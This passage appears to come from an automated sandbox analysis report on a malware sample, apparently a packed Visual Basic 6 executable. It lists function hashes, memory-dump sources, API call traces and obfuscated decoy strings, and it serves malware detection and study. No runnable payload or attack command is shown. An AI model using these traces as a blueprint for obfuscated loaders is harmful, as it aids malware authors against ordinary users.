Opcode ID: 58daf6d99bcdfa85a6f601fd2acbf7bf023ecc9f37e08382670793c833a9d440
Instruction ID: d92a3e3d2c53de3c55bc284c8d7f04033c3562fa490e24abdebdc0c110845f5a
Opcode Fuzzy Hash: 58daf6d99bcdfa85a6f601fd2acbf7bf023ecc9f37e08382670793c833a9d440
Instruction Fuzzy Hash: 4571802055C7C28DDB228B788888B52BED15F13370F4EC3DAC4EA4E1EBD3A58546C712

Uniqueness

Uniqueness Score: -1.00%

Function 022D3F94, Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

Dua, xrefs: 022D402D

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID: Dua
API String ID: 0-1073344286
Opcode ID: 575fe1292e1b334b08547bbdfc4ab5be0c500aa5c6e0ff1356a8e1370b7f4959
Instruction ID: f79923ea7239597e2545e2a6e0f6ea2122e9bb2df894d5e23772a7ace935b9b0
Opcode Fuzzy Hash: 575fe1292e1b334b08547bbdfc4ab5be0c500aa5c6e0ff1356a8e1370b7f4959
Instruction Fuzzy Hash: 4851F170128346DFCB64AF78C999BE9BBE0FF18344F464519DC869B265D3749980CF12

Uniqueness

Uniqueness Score: -1.00%

Function 022D2A4A, Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

VH2, xrefs: 022D2BF1

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID: VH2
API String ID: 0-3111238981
Opcode ID: 85904c113d8e744c266075730f1869acf3bb50f4054c6802a4bdb8ac5c899c03
Instruction ID: f46ca3d86cef8fc167b8192e2f3db14de14369e8836ef6a38fdb4129b328d98c
Opcode Fuzzy Hash: 85904c113d8e744c266075730f1869acf3bb50f4054c6802a4bdb8ac5c899c03
Instruction Fuzzy Hash: DD31CDB2618349DFCB64AE74CC50AEE7BB6AF99350F560419EC89D7225D3304A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022D3209, Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07da1ace73a7cadc2c737d0d9473a6464e049a0d693fa2a17d74b13da33c9d66
Instruction ID: 8ee805ff7654278d6c2058282b6df6949608d0247473755f9cc721f43ff106e5
Opcode Fuzzy Hash: 07da1ace73a7cadc2c737d0d9473a6464e049a0d693fa2a17d74b13da33c9d66
Instruction Fuzzy Hash: C3D1CC71718746DFDB28CF68CC80BEAB7A1BF49310F15426ADC999B254D7B0A950CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D327D, Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d53a0f2e5258a8e5cd3b0be0a1d15b18f62cbc02f23fa6a58f5764dad0aa5ee
Instruction ID: c6b7f38e6ac28209676f6aad03280fd078bdcb3ac91f5ee05c374eeecf547a22
Opcode Fuzzy Hash: 7d53a0f2e5258a8e5cd3b0be0a1d15b18f62cbc02f23fa6a58f5764dad0aa5ee
Instruction Fuzzy Hash: A2D1BA71714746DFDB28CF68CC80BEAB7A1BF49310F15826ADC999B254D7B0A950CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D334F, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1109cde6e7ab473a6f1cb7ef06e4b82cd3ef6df83b968474f8000791f0193264
Instruction ID: 6641aa856f6292c026016da4852710d9f2aaa12dfebd7b543c4f523798f295f2
Opcode Fuzzy Hash: 1109cde6e7ab473a6f1cb7ef06e4b82cd3ef6df83b968474f8000791f0193264
Instruction Fuzzy Hash: D5C1CB71614746DFDB28CF68CC84BDAB7A1BF49310F55826ADC999B284C770A950CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D33BC, Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad842bbb2b98cc5de886cf8694408bafd2749c6d0ce3012da82d92625005d09f
Instruction ID: b4ed5ac19d1d6847f378826791d81c0d5ed9c8fd721b8ce84431483db91d01b3
Opcode Fuzzy Hash: ad842bbb2b98cc5de886cf8694408bafd2749c6d0ce3012da82d92625005d09f
Instruction Fuzzy Hash: 02B1BD71714746DFDB28CF68CC847DAB7A1BF49310F15826ADC999B284D7B0A950CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D346D, Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99055c34a2f1277ca1ad69c746a29b7b7572d0468c896dbf1fd9f66190fc7a26
Instruction ID: 14b0b1abbe0157c4fbe8b0a66c5590d6e9eae5cba82875e69bda4f54cd216b16
Opcode Fuzzy Hash: 99055c34a2f1277ca1ad69c746a29b7b7572d0468c896dbf1fd9f66190fc7a26
Instruction Fuzzy Hash: 69A1BC71614745DFDB38CF68CC80BEAB7A1BF49310F55426AEC999B294D770A940CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D3451, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e7c29848353fc3a77ea1c345d885a321814399cded42bd55f1233f8d61cddb
Instruction ID: 26f36b8371a51d82bf2c375d50c1027f147ee99908b866183234aed2369fbf6f
Opcode Fuzzy Hash: 99e7c29848353fc3a77ea1c345d885a321814399cded42bd55f1233f8d61cddb
Instruction Fuzzy Hash: 3BA19C71614745DFDB38CF68CC84BEAB7A1BF49310F15426AEC999B294D7B0A940CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D3531, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2fbb9dbbb5b8c1cf8a4bf3d8813a5668d3e95bfdd5b535c189f719bacaf8d5
Instruction ID: 6e31aaacb332d227101b197967a2f2423cba56fb6a625aef58022f4698565d11
Opcode Fuzzy Hash: ab2fbb9dbbb5b8c1cf8a4bf3d8813a5668d3e95bfdd5b535c189f719bacaf8d5
Instruction Fuzzy Hash: 2491CC71614745DFDB38CF68CC80BDAB7A1BF49310F15826AEC999B294C771A940CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D3624, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f92c404b1913f573d2a4a610304cb39f374223157ebb9f88391379ef3cd1d052
Instruction ID: 22fef598f6d2797b2b6881029b208e967bf4008627a9233dc97c289e6891b47e
Opcode Fuzzy Hash: f92c404b1913f573d2a4a610304cb39f374223157ebb9f88391379ef3cd1d052
Instruction Fuzzy Hash: CD81EF71718745DFDB24CF68CC80BDAB7A2BF49310F15426AEC999B294C7B0A950CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D2C99, Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b0b8f9a81f117e070cb669cdb69152fb63fe4886cc3884a48a72dd3c132a23
Instruction ID: 6dfa17c0e2f8cff8ae6fb6d153ce0705b46c0eba0bcd69758955fa943a5a1fd1
Opcode Fuzzy Hash: d2b0b8f9a81f117e070cb669cdb69152fb63fe4886cc3884a48a72dd3c132a23
Instruction Fuzzy Hash: D66120729183858FCB70CE68CC487DEBBF1EF99350F51452EAC899B214D7709941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022D36AD, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fcdb390f34103606a3e0d7f77d10fb212a45f9ae8d06d00f6a49fb519dfacde
Instruction ID: 267a991ef4b31a0dd47e674f4c1011e778d8b5dc2b2d84abb582d6c971466460
Opcode Fuzzy Hash: 2fcdb390f34103606a3e0d7f77d10fb212a45f9ae8d06d00f6a49fb519dfacde
Instruction Fuzzy Hash: 1D71F171714745DFDB28CF68CC80BDAB7A2BF45310F15426AEC999B294C7B1A950CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022D2D32, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488ec925c13dc70633fe873d67eb3b8e4164638260fbd66391ed7caf86de21c7
Instruction ID: 559bc0fa5eec2f156a428db2e3acce2e972794a1a5c842b79bd693a0740719d9
Opcode Fuzzy Hash: 488ec925c13dc70633fe873d67eb3b8e4164638260fbd66391ed7caf86de21c7
Instruction Fuzzy Hash: A0510172A143858FCB70CE68CC94BDEBBF5EF99310F55452DAD889B214D7709A41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022D2DAD, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b21c74790be1054d9f7457387d9c0a9af654c25f8ffa0262bb215ba3b72c8b4d
Instruction ID: cca2a03d80fa72afee2836681e6bdea051c445821cab16cbc164db14319929f4
Opcode Fuzzy Hash: b21c74790be1054d9f7457387d9c0a9af654c25f8ffa0262bb215ba3b72c8b4d
Instruction Fuzzy Hash: FD5101729143858FCB30CE69CC58BDE7BE5EF99310F55412DAC8D8B214D7709A41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022D3BBC, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73d2a9e812e44ea17558a7156978cb60d39b7bbdad9fa872fe637c0d82f1dc1b
Instruction ID: a05056ac9e28345101377c3d50de7f50ecdd0dbad963d5d72c7720a4762def01
Opcode Fuzzy Hash: 73d2a9e812e44ea17558a7156978cb60d39b7bbdad9fa872fe637c0d82f1dc1b
Instruction Fuzzy Hash: 9F514A717142899FDB68CF68CC94BEA77A1FF88300F05822DAC5D8B388DB309A45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 022D1F7F, Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c232102028453752b0939dc5c0d07d317bb2406264e4be43aa59c51e9e957340
Instruction ID: 6700ef93b386ec3f1621775a7bca4d5fd6c21b91421fd21bbde17a02205f8d81
Opcode Fuzzy Hash: c232102028453752b0939dc5c0d07d317bb2406264e4be43aa59c51e9e957340
Instruction Fuzzy Hash: 2451BF71A18398DFCB70CF698C94BDA77E6EF98340F4A412AED8C9B215C3715A41DB41

Uniqueness

Uniqueness Score: -1.00%

Function 022D1FE4, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bfd061a2c2684bf4f76b5ea3c80bb3a565a4b66f7adfac3bc742a18e19b8e1
Instruction ID: 339d4f555187a80b9d6431104388cadfd5734edd7205f3568ae972b1d5a41a2e
Opcode Fuzzy Hash: 08bfd061a2c2684bf4f76b5ea3c80bb3a565a4b66f7adfac3bc742a18e19b8e1
Instruction Fuzzy Hash: AC41AE71A18398DBCB70CF698D94BDA7BE6AF98340F4A412AED4CDB215C3715A40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 022D6584, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1008c88388cad19ed9fdeab26d5c286a49ebd2be060ef206d0e8095fa8383b6e
Instruction ID: eb6e6f4bd8b12197a519ee4395897bad29a49ad57177cd914b40c73cb7391f19
Opcode Fuzzy Hash: 1008c88388cad19ed9fdeab26d5c286a49ebd2be060ef206d0e8095fa8383b6e
Instruction Fuzzy Hash: 23212E75628345DFCB788E78E9A2AFB76A6BF48300F41451EED9B97284C7340600CA1A

Uniqueness

Uniqueness Score: -1.00%

Function 022D65BD, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a46b0dc631652bfdb217297eb6d18156312ea3004f2db1c71c4afd124ba1e1
Instruction ID: 1705316cc4ac51bf6896252f7705469374a9ae49bad23b1d4888ae15a03d1d0f
Opcode Fuzzy Hash: 28a46b0dc631652bfdb217297eb6d18156312ea3004f2db1c71c4afd124ba1e1
Instruction Fuzzy Hash: 81112275728344DFDF788EB8D9A6AFB76A5BB0C300F41050EED9B97284C7340200CA1A

Uniqueness

Uniqueness Score: -1.00%

Function 022D9AC5, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97b1eaedff478b4f68c29ba086cc0746f3b8bb1ea9857415ab147af968ba2f0
Instruction ID: e71d1edde3b1c6d7217cdfeae882b2d5ec1c66aa9d56183dfd88a5dc62ed8094
Opcode Fuzzy Hash: f97b1eaedff478b4f68c29ba086cc0746f3b8bb1ea9857415ab147af968ba2f0
Instruction Fuzzy Hash: 5DF0D474324A01CFC769DF88C5D4A6AB3AAEB89610F228565F849CB269D730EC81CA54

Uniqueness

Uniqueness Score: -1.00%

Function 022D90E4, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761203641.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00420570, Relevance: 82.5, APIs: 39, Strings: 8, Instructions: 264COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004028B0,00422010), ref: 004205C3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004205E2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B20,00000134), ref: 00420627
__vbaFreeObj.MSVBVM60 ref: 00420634
__vbaLenBstrB.MSVBVM60(00403E98), ref: 0042063F
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 00420661
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 00420686
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,00000138), ref: 004206AF
__vbaFreeObj.MSVBVM60 ref: 004206B4
#690.MSVBVM60(Godset,Fourpounder,Nittenaarigt4,FILMDOM), ref: 004206CE
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 004206E7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420700
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B9C,00000120), ref: 00420723
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 00420738
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420751
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B60,00000130), ref: 00420774
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00420782
__vbaI4Var.MSVBVM60(00000000), ref: 0042078C
__vbaInStr.MSVBVM60(00000000,?,PETHER,00000000), ref: 004207A0
__vbaFreeStr.MSVBVM60 ref: 004207AF
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004207BF
__vbaFreeVar.MSVBVM60 ref: 004207CB
__vbaStrCat.MSVBVM60(00403F50,00403F44,00000002), ref: 004207E5
__vbaStrMove.MSVBVM60 ref: 004207F6
__vbaInStr.MSVBVM60(00000000,00403F50,00000000), ref: 00420800
__vbaFreeStr.MSVBVM60 ref: 00420813
#703.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00420834
__vbaStrMove.MSVBVM60 ref: 0042083F
__vbaFreeVar.MSVBVM60 ref: 0042084A
__vbaStrCat.MSVBVM60(00403F6C,15:15:), ref: 00420856
__vbaStrMove.MSVBVM60 ref: 00420861
#541.MSVBVM60(00000002,00000000), ref: 00420868
__vbaStrVarMove.MSVBVM60(00000002), ref: 00420872
__vbaStrMove.MSVBVM60 ref: 0042087D
__vbaFreeStr.MSVBVM60 ref: 00420882
__vbaFreeVar.MSVBVM60 ref: 00420887
#580.MSVBVM60(Diaphysial,00000001), ref: 00420890
__vbaFreeStr.MSVBVM60(004208D8), ref: 004208D0
__vbaFreeStr.MSVBVM60 ref: 004208D5

Strings

Nittenaarigt4, xrefs: 004206BF
Diaphysial, xrefs: 0042088B
Godset, xrefs: 004206C9
PETHER, xrefs: 00420798
FILMDOM, xrefs: 004206BA
15:15:, xrefs: 0042084C
Afgiftsperioderne3, xrefs: 0042068D
Fourpounder, xrefs: 004206C4

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresultMove$New2$#541#580#690#703BstrCallLateList
String ID: 15:15:$Afgiftsperioderne3$Diaphysial$FILMDOM$Fourpounder$Godset$Nittenaarigt4$PETHER
API String ID: 132566401-2679451372
Opcode ID: a10a5ed5a2b1987e686832f33302489c41e01b6cd9f8bb6228943243922f8991
Instruction ID: 57c35ee5babe2385cc974c5c97b1cce480b3639faba3c395a72a4d8613dd5b96
Opcode Fuzzy Hash: a10a5ed5a2b1987e686832f33302489c41e01b6cd9f8bb6228943243922f8991
Instruction Fuzzy Hash: 64916271A00215ABDB14EFA4DD89FDE7BB8EF48701F10412AF506F72E1DA74A905CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041F6C0, Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041F721
__vbaHresultCheckObj.MSVBVM60(00000000,004018A8,0040338C,00000114), ref: 0041F74A
__vbaHresultCheckObj.MSVBVM60(00000000,004018A8,0040338C,00000110), ref: 0041F773
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 0041F791
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 0041F7B6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,00000110), ref: 0041F7DC
__vbaStrMove.MSVBVM60 ref: 0041F7EB
__vbaFreeObj.MSVBVM60 ref: 0041F7F4
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 0041F80D
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 0041F832
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,00000130), ref: 0041F858
__vbaStrMove.MSVBVM60 ref: 0041F867
__vbaFreeObj.MSVBVM60 ref: 0041F870
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041F889
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F8A2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B00,00000128), ref: 0041F8C9
_adj_fdiv_m64.MSVBVM60 ref: 0041F8EE
__vbaFpI4.MSVBVM60(43540000,?,42500000), ref: 0041F91F
__vbaHresultCheckObj.MSVBVM60(00000000,004018A8,0040338C,000002C0,?,42500000), ref: 0041F95E
__vbaFreeObj.MSVBVM60(?,42500000), ref: 0041F963
#538.MSVBVM60(?,000007DB,0000000B,0000000B), ref: 0041F976
#557.MSVBVM60(?), ref: 0041F980
__vbaFreeVar.MSVBVM60(?,42500000), ref: 0041F99D
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 0041F9BB
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 0041F9E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,000000D8), ref: 0041FA06
__vbaStrMove.MSVBVM60 ref: 0041FA1B
__vbaFreeObj.MSVBVM60 ref: 0041FA20
#535.MSVBVM60 ref: 0041FA26
__vbaVarDup.MSVBVM60 ref: 0041FA42
#667.MSVBVM60(?), ref: 0041FA4C
__vbaStrMove.MSVBVM60 ref: 0041FA57
__vbaFreeVar.MSVBVM60 ref: 0041FA5C
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041FA71
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FA8A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403BD0,00000078), ref: 0041FAAB
__vbaFreeObj.MSVBVM60 ref: 0041FAB6
__vbaFreeStr.MSVBVM60(0041FB00), ref: 0041FAE9
__vbaFreeStr.MSVBVM60 ref: 0041FAEE
__vbaFreeStr.MSVBVM60 ref: 0041FAF3
__vbaFreeStr.MSVBVM60 ref: 0041FAF8
__vbaFreeStr.MSVBVM60 ref: 0041FAFD

Strings

Udstyringer4, xrefs: 0041FA34

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#535#538#557#667Copy_adj_fdiv_m64
String ID: Udstyringer4
API String ID: 551562340-2591053628
Opcode ID: 42e4682fc3a485fce91252a03c4d553b38bf2be1ebe6c936fad1b1596af59702
Instruction ID: 3bb422ba69ea2d55ecadd1205a0cb80c620e8678c098304e2a9b6aaed2429946
Opcode Fuzzy Hash: 42e4682fc3a485fce91252a03c4d553b38bf2be1ebe6c936fad1b1596af59702
Instruction Fuzzy Hash: 13C16170A00219ABCB14DFA4DD88EDE7BB8FF08705F10852AF545B71A0DB746946CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE40, Relevance: 63.2, APIs: 35, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00403D38,00403D30), ref: 0041EEA8
__vbaStrMove.MSVBVM60 ref: 0041EEB5
__vbaStrCat.MSVBVM60(00403D40,00000000), ref: 0041EEBD
__vbaStrMove.MSVBVM60 ref: 0041EEC4
__vbaFreeStr.MSVBVM60 ref: 0041EECF
#514.MSVBVM60(?,00000002), ref: 0041EED7
__vbaStrMove.MSVBVM60 ref: 0041EEE2
__vbaStrCmp.MSVBVM60(00403D40,00000000), ref: 0041EEEA
__vbaFreeStr.MSVBVM60 ref: 0041EEFD
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 0041EF1A
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 0041EF45
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,000000E8), ref: 0041EF73
__vbaStrMove.MSVBVM60 ref: 0041EF84
__vbaFreeObj.MSVBVM60 ref: 0041EF89
#536.MSVBVM60(?), ref: 0041EF9E
__vbaStrMove.MSVBVM60 ref: 0041EFA9
__vbaFreeVar.MSVBVM60 ref: 0041EFAE
#570.MSVBVM60(00000010), ref: 0041EFB6
__vbaStrCat.MSVBVM60(00403D50,00403D48), ref: 0041EFDC
#632.MSVBVM60(?,?,00000002,00000002), ref: 0041EFFA
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041F01F
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 0041F036
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 0041F05A
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 0041F07F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,000000C8), ref: 0041F0A8
__vbaFreeObj.MSVBVM60 ref: 0041F0AD
#613.MSVBVM60(00000002,00000008), ref: 0041F0C6
__vbaStrVarMove.MSVBVM60(00000002), ref: 0041F0D0
__vbaStrMove.MSVBVM60 ref: 0041F0DB
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000002), ref: 0041F0EA
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000B4,kombinationsuddannelse), ref: 0041F101

Strings

kombinationsuddannelse, xrefs: 0041F0F3

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.760331464.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.760356186.0000000000424000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$FreeMove$CheckHresult$ListNew2$#514#536#570#613#632FileOpen
String ID: kombinationsuddannelse
API String ID: 2582689820-1354069041
Opcode ID: cb2985e16323ad9301be97f14ba894d45f72fde25887031738ca45643f3f428d
Instruction ID: 27fcc652bcab18dff8092da0430ff5c9be425fd2d65e4cd4457c914cb44aec80
Opcode Fuzzy Hash: cb2985e16323ad9301be97f14ba894d45f72fde25887031738ca45643f3f428d
Instruction Fuzzy Hash: AE914E71D00219ABCB10DFA5DD89EEEBBB8FF48701F10412AE506B72A4DB745945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041F170, Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 243COMMON

Download Yara Rule

APIs

#610.MSVBVM60(?), ref: 0041F1EA
#610.MSVBVM60(?), ref: 0041F1F0
__vbaVarAdd.MSVBVM60(?,?,?,00000001,00000001), ref: 0041F215
#662.MSVBVM60(?,00403D8C,?,00000000), ref: 0041F229
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041F24A
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041F265
#536.MSVBVM60(?), ref: 0041F286
__vbaStrMove.MSVBVM60 ref: 0041F291
__vbaFreeVar.MSVBVM60 ref: 0041F29A
__vbaNew2.MSVBVM60(00403AE0,004223CC), ref: 0041F2B2
__vbaHresultCheckObj.MSVBVM60(00000000,02BAEF84,00403AD0,00000014), ref: 0041F2D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AF0,00000118), ref: 0041F304
__vbaI2I4.MSVBVM60 ref: 0041F310
__vbaFreeObj.MSVBVM60 ref: 0041F319
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041F344
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F35D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C28,00000180), ref: 0041F387
__vbaLateMemCall.MSVBVM60(?,cvJmrvNfRhBzOP3gU202,00000003), ref: 0041F3FF
__vbaFreeObj.MSVBVM60 ref: 0041F40B
__vbaNew2.MSVBVM60(004028B0,00422010), ref: 0041F424
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F43D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B20,00000134), ref: 0041F486
__vbaFreeObj.MSVBVM60 ref: 0041F48F
__vbaFreeStr.MSVBVM60(0041F4D8), ref: 0041F4C8
__vbaFreeObj.MSVBVM60 ref: 0041F4D1

Strings

Subfreshman, xrefs: 0041F333
cvJmrvNfRhBzOP3gU202, xrefs: 0041F3DF

Memory Dump Source

Source File: 00000000.00000002.760283199.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.760272930.0000000000400000.00000002.00020000.sdmp Download File
